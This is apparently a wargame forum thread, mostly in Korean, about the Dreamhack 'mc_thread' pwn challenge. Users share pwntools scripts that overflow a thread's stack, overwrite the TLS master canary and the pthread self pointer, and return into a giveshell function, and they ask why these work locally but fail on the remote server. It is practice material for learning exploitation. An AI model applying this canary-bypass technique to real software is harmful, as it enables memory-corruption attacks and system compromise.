image.png 주어진 Dockerfile 빌드 (docker build -t m_t . ; docker run -d -it -p 7182:7182 --name mc_thread m_t) from pwn import * context.arch = 'amd64' context.log_level = 'debug' p = process('./mc_thread') p = remote("host3.dreamhack.games", 17841) p = remote('localhost', 7182) e = ELF('./mc_thread') def gdb_on(): gdb.attach(p) pause() gdb_on() code_section_addr = 0x404500-0x972 p.sendlineafter(b'Size: ', b'2352') payload = b'A'*0x110 # dummy payload += b'B'*0x8 # sfp payload += p64(e.symbols['giveshell']) # ret payload += b'C'*0x7f0 # dummy payload += p64(code_section_addr) # fs+0x10 payload += b'A'*0x18 # fs+0x28 p.sendafter(b'Data: ', payload) p.interactive() image.png p = remote('localhost', 7182)로 flag 출력 확인 image.png p = remote("host3.dreamhack.games", 17841) 실패 제공된 Dockerfile을 빌드해서 테스트 했을 때, flag 출력을 확인을 했기에 서버와 동일하다고 생각 돼 서버 주소로 바꾸니 되지 않습니다...Dockerfile과 서버 환경이 다른지, 아니면 제가 잘못 빌드한 것인지 궁금합니다.

아래처럼 p.send 호출할 때 하나의 payload 를 만들어서 호출하면 서버에 제출 시 쉘 획득이 되는데, from pwn import * d = 0x7f0 p = process("./mc_thread") p = remote("host3.dreamhack.games", 21778) p = remote("localhost", 7182) p_elf = ELF("./mc_thread") p.sendlineafter(b"Size: ", str( (0x110 + d + 0x28 + 8) // 8).encode()) p.recvuntil(b"Data: ") payload = b"A" * 0x110 payload += b"A" * 8 payload += p64(p_elf.symbols["giveshell"]) payload += b"A" * (d - 0x10) payload += b"A" * 0x10 payload += p64(0x404800 - 0x972) payload += b"A" * 0x18 p.send(payload) p.sendline(b"ls") recved = p.recv(100) info(f"received: {recved}") if b"smash" in recved: raise RuntimeError("Smash detected") success(f"0x{d:x}: Success") p.interactive() 제공된 소스코드에 read가 여러번 나눠서 받아 아래처럼 send를 똑같은 수만큼 나눠서 전송하면 p.recv(100) 에서 EOFError 가 나는데 이유가 무엇인지 궁금합니다. from pwn import * d = 0x7f0 p = process("./mc_thread") p = remote("host3.dreamhack.games", 21778) p = remote("localhost", 7182) p_elf = ELF("./mc_thread") p.sendlineafter(b"Size: ", str( (0x110 + d + 0x28 + 8) // 8).encode()) p.recvuntil(b"Data: ") for i in range(0x100 // 8): p.send(b"A" * 8) p.send(b"A" * 8) # rbp - 0x10 p.send(b"A" * 8) # rbp - 0x8(cnry) p.send(b"A" * 8) # rbp(sfp) p.send(p64(p_elf.symbols["giveshell"])) for i in range((d - 0x10) // 8): p.send(b"A"*8) p.send(b"A" * 8) p.send(b"A" * 8) p.send(p64(0x404800 - 0x972)) # pthread->self p.send(b"A" * 8) p.send(b"A" * 8) p.send(b"A" * 8) # master canary overwrite p.sendline(b"ls") recved = p.recv(100) info(f"received: {recved}") if b"smash" in recved: raise RuntimeError("Smash detected") success(f"0x{d:x}: Success") p.interactive() 근데 또 이상한건 서버에 제출하면 안되는데, 제공된 Dockerfile로 Docker 환경 구축해서 제출(p = remote("localhost", 7182)) 혹은 로컬 환경(p = process("./mc_thread"))에서 실행하면 정상적으로 동작합니다...

우분투 20.04, 18.04 로컬에서는 됐는데 서버에서는 왜 안 될까요... 설마 16.04 일까요

로컬환경 ubuntu 22.04로 서버와 동일합니다. 혹시몰라 강의 예제코드 복붙해서 실행시켜봤는데도 (process() 만 remote() 로 변경해서요) 안됩니다... 이유가 있을까요?

The exploit (that dreamhack shows on exploit tech) works perfectly on local, but on remote it doesn't work... I try to bruteforce the distance between payload and master canary, Here is my script `from pwn import * context.log_level = 'debug' for i in range(400, 9000, 8): p = remote("host3.dreamhack.games", 17226) elf = ELF('./mc_thread') payload = b'A' * 264 payload += b'A' * 8 # canary payload += b'B' * 8 payload += p64(elf.symbols['giveshell']) payload += b'C' * (i - len(payload)) payload += p64(0x404800 - 0x972) payload += b'C' * (0x10) payload += p64(0x4141414141414141) inp_sz = len(payload) // 8 p.sendlineafter(b'Size: ', str(inp_sz).encode()) p.sendafter(b'Data: ', payload) p.sendline("cat flag") data = p.recvallS(timeout=3) if "DH{" in data: print(data) break` Is it like an overkill and I can understand the distance there is on remote? or I really need to do bruteforce? Thanks in advance